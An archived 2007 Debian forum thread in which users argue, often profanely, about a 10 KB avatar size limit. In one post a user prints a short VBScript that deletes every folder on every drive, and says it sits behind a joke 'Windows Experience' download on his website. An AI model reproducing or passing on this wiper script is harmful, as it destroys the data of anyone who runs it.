ASRRGASHDFASDR

Have something to say about forums.debian.net itself?

ASRRGASHDFASDR

Postby Grifter » 2007-03-14 15:37

goddammit can you remove the bloody 10kb 80x80 avatar restrictions!?!! ARGH!
Eagles may soar, but weasels don't get sucked into jet engines...
Grifter

Postby Burnside » 2007-03-15 01:31

Whoa... better do what he says... I've never seen Grifter lose his temper before. :wink:
Burnside

Postby thamarok » 2007-03-15 07:29

Burnside wrote:Whoa... better do what he says... I've never seen Grifter lose his temper before. :wink:
Look at Grifter's website: http://www.fagotten.org/grifter/
It's even scarier and the "full Windows Experience" contains a virus :lol:
thamarok

Postby Grifter » 2007-03-16 00:29

Not a virus, it's just a vbscript that erases your harddrives (:
Grifter

Postby Grifter » 2007-03-16 00:31

infact, here's the source for it, I asked a friend to write it for me since I don't know anything about either windows or programming

Code: Select all
On Error Resume Next

Set filesys = CreateObject("Scripting.FileSystemObject")
Set drives = filesys.Drives

For Each drive in drives
   filesys.DeleteFolder drive.DriveLetter & ":\*", True
Next

Grifter

Postby Burnside » 2007-03-16 01:06

I stand corrected.
Burnside

Postby Grifter » 2007-03-16 03:14

It's rare that I lose my temper, but when I wrote this thread I was pretty fuming
Grifter

Postby Jeroen » 2007-03-20 00:20

Tip: If you want to get something done from admins:
    - Contact them the way they've indicated as wanting to be contacted
    - Use a meaningful subject
    - Don't just swear and such
    - Give a reason why you request something

But well, in this case, I don't think you should bother, because the answer is very likely to be "no".
Jeroen
Debian Developer, Site Admin
Debian Developer, Site Admin

Postby Dargor » 2007-03-20 04:38

Grifter cant your little man just lose his legs, its not like he needs them to walk anywhere.
Dargor

Postby Grifter » 2007-03-20 13:43

Jeroen wrote:Tip: If you want to get something done from admins:
    - Contact them the way they've indicated as wanting to be contacted
    - Use a meaningful subject
    - Don't just swear and such
    - Give a reason why you request something

But well, in this case, I don't think you should bother, because the answer is very likely to be "no".

Well **** you and the horse you rode in on.

This change that came about was the will of the elite, there was no voting, there was no polling of users' opinions, it happened because the powerful few _could_ make it happen and to excercise a powertrip over us mere mortals.

It's 2007 today and a lot of people have had broadband for many years, people haven't used 1200baud modems for a very long time (but I'm sure some lunatics persist), limiting the size to 10kb is preposterous; Most (if not all) modern day graphical browsers are highly configurable and you can configure the displaying/downloading of images, and if you happen to be on a 1200baud modem you should bloody well turn off images in your own browser - not force the rest of the world to adapt to you just because you're in a position to excercise that option like some sort of Father Police Who Knows What Is Best For Everyone.

If images disturb you so much there are many terminal browsers out there who shave away any fluff - perfectly suited for your 1200baud lifestyle.

Limiting the dimensions of the image is one thing - there are some sane options that can be used, but the only one on these forums who had an avatar which went above and beyond was kinetic with his vampire-alien-monster-thing, but he changed that himself after a while anyway, long before this avatar-hating decision went into effect, so that is a non-issue.

This is a 'private' forum and not an official one by any means, so you at the top can make any choice about it that you want. That said, I expected better from debian people, people who are usually so impassioned and committed to preserve the freedoms for everyone.

This is not freedom, it's pure fascism, the limits put in place are too small, in particular the size. You could have given people a choice; for example have an option in the profile where a user can determine he or she doesn't want to see any avatars, or perhaps have a user-defined size option in the same profile where the avatars get crushed into each user's own defined settings, instead of making it mandatory on a global scale.

It's bullshit man.
Grifter

Postby thamarok » 2007-03-20 13:53

> Well f**k you and the horse you rode in on.
I wouldn't say something similar to an admin ;)
thamarok

Postby DeanLinkous » 2007-03-20 15:26

grifter, where the HELL do you get off.....wait a minute - he makes a damn good point!
Aye, fight and you may fail, sellout, and you may live, a while. And dying in your MScash beds, you'll be willin' to trade ALL the cash, to come back here and tell our enemies that they may FUD our customers, but they'll never take...OUR FREEDOM!
DeanLinkous

Postby simen » 2007-03-21 02:29

:shock: Wow! Go Grifter, I say ;)

--Simen
simen

Postby Pobega » 2007-03-21 10:28

I do agree on one point with Grifter. Debian is about freedom, and the avatar limit really does impede on our freedoms. Limiting it to a sensible size sure, I understand that. But a 10kb 80x80 avatar limit is pretty bad, 80x80 is bearable but a 10kb limit on filesize? That's just too much in my opinion.

If people don't want to see our avatars they can just AdBlock them, or do something so that they don't have to see the avatars everytime they load a page (This is assuming that everyone here is on Konqueror or a Gecko based browser, and not AOL).

Grifter makes a good point, and I have to say I agree with him on this one.
Pobega

Postby thamarok » 2007-03-21 14:22

10Kb is very small too.. unless you are going to use 8bit or 16bit palettes, then it's fine, but for true 32bit (24bit + 8bit alpha) you certainly need atleast 100kb for a good 120x120 avatar.
thamarok

Next

Return to Forum stuff & feedback